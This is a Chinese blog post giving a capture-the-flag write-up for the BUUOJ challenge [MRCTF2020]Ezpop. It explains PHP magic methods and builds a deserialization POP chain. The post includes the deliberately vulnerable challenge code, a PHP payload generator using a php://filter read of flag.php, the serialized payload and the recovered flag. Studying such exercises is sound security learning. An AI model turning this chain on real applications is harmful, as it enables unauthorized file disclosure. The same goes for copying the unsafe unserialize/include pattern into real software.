[MRCTF2020]Ezpop

最新推荐文章于 2024-03-15 23:57:51 发布
最新推荐文章于 2024-03-15 23:57:51 发布
阅读量1.7k 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hopeace/article/details/120835255
版权

[MRCTF2020]Ezpop

作者:Hopeace

靶机地址:https://buuoj.cn/challenges#[MRCTF2020]Ezpop

0x01 浏览题目

不用看了,反序列化构造和绕过

这种题主要是考察各类魔术方法的触发条件,不断构造调用形成一条链

0x02 分析题目

<?php
//flag is in flag.php
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
__invoke()

当尝试以调用函数的方式调用一个对象时,该方法会被自动调用

class invoke
{
    public function __invoke($x)
    {
        var_dump($x);
    }
}
 
$obj = new invoke;
$obj(10); 
/*
 输出:
 int 10
*/
__get()
<?php
class Person{
	/*封装私有成员属性*/
	private $name='张三';private $sex='男';private $age=12;
	/*__get()方法用来获取私有属性*/
	function __get($property_name){
		echo '在直接获取私有成员属性得时候,自动调用了这个__get()方法<br/>';
		if(isset($this->$property_name))
		{
			return ($this->$property_name);
		}else{
			return NULL;
		}
	}
}
$p1=new Person();
/*直接获取私有属性得值,会自动调用__get()的方法,返回成员属性的值*/
echo '姓名:'.$p1->name.'<br/>';
echo '性别:'.$p1->sex.'<br/>';
echo '年龄:'.$p1->age.'<br/>';
————————————————
版权声明:本文为CSDN博主「weixin_42113474」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_42113474/article/details/108894764

调用不存在的成员变量时也会触发

其余常见魔术方法
__construct()创建对象时调用
__destruct()销毁对象时调用
__toString()把对象转换为字符串,打印一个对象时被调用
__sleep()在序列化前被调用,此功能可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组
__wakeup()将在序列化之后立即被调用

0x03 代码审计

从出处向前找

最后应该是include去包含相关文件,需要调用Modifier里的append函数

append需要出发__ invoke魔术方法,看到Test类 里的 __get里的return $function();可以出发invoke,

继续,要触发__get 需要去找一个无source的类

调用__tostring $this->str, 赋值一个Test类,

然后是正则匹配preg_match,会触发__tostring

最后,传入pop参数值,触发__wakeup

pop链构成为:

pop传参 => __wakeup => __tostring => __get => __invoke => 调用include函数去包含flag.php这样的敏感文件

即 Modifier::__invoke()<–Test::__get()<–Show::__toString()

构造代码块

<?php
class Modifier{
    protected $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;
    }
    public function __toString(){
        return "output anything you want";
    }
}
class Test{
    public $p;
}
$payload = new Show('test');
$payload->str = new Test();
$payload->str->p = new Modifier();
$hack = new Show($payload);
echo urlencode(serialize($hack));
?>

本地运行得到

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A4%3A%22test%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

得到一段base64编码

PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFne2NmMWM0ZTE3LTE2ODktNDljNS1hOTE4LTVkMjRiNzA1M2U1Y30iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+

解码得到

<?php class Flag{ private $flag= "flag{cf1c4e17-1689-49c5-a918-5d24b7053e5c}"; } echo "Help Me Find FLAG!"; ?>
Hopeace
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强支护,保证工作面的稳定生产。
vigenere-cipher:Vigenere密码
03-19
虚拟密码 vigenere密码是一种利用密钥的加密和解密方法。它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
buuctf】MRCTF2020-Ezpop小白详解
最新发布
m0_73860001的博客
03-15 871
真的很详细
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
向前欧拉法matlab代码 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点问题,更多可以看博客 1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以利用里面任意两个素数$N_i,N_j$,用扩展欧几里得算法求到满足$x_iN_i+x_jN_j=1$的$x_i,x_j$的值,设 $C=\sum\limits_{k=0}^{len(N)-1}N_k(k\ne i\ne j)$,那么$Cx_iN_i+Cx_jN_j=C$,即$Cx_iN_i+Cx_jN_j+\sum\limits_{i=1}^{len(N)-1}(-1)N_i(i\ne i\ne j)=0$,就是说数组$X$对应$i,j$位置为$x_i,x_j$,其余全为$-1$,即可满足。 选择不同的素数对,传$l
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
MRCTF2020 Ezpop wp
arcuied
11-27 462
MRCTF2020 Ezpop wp
[BUUOJ][MRCTF2020]Ezpop
Y4tacker的博客
09-22 5088
文章目录代码审计阶段Modifier类Show类Test类构造pop链 代码审计阶段 按照步骤一步一步分析 Modifier类 首先第一个Modifier类 class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var);
BUUCTF: [MRCTF2020]Ezpop
末初的CSDN博客
09-19 389
的触发条件是把实例对象当作方法调用。很明显,如果把实例对象赋给。的触发条件是调用不可访问的属性或者方法,能做到的只有。是有办法通过php伪协议读取到。在当前目录,而整个题目只有。限定了形参为字符型,如果。
BUU__Web 分类练习文档
风过江南乱的博客
08-18 914
前言 这是赵总总结分类的,我只是搬一下,保存一下,原链接 赵总博客 分类 1、代码审计以及反序列化 https://buuoj.cn/challenges#BUU%20CODE%20REVIEW%201 https://buuoj.cn/challenges#[HCTF%202018]WarmUp https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP https://buuoj.cn/
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2231
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
BUU刷题记录——4
weixin_43610673的博客
08-31 1596
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值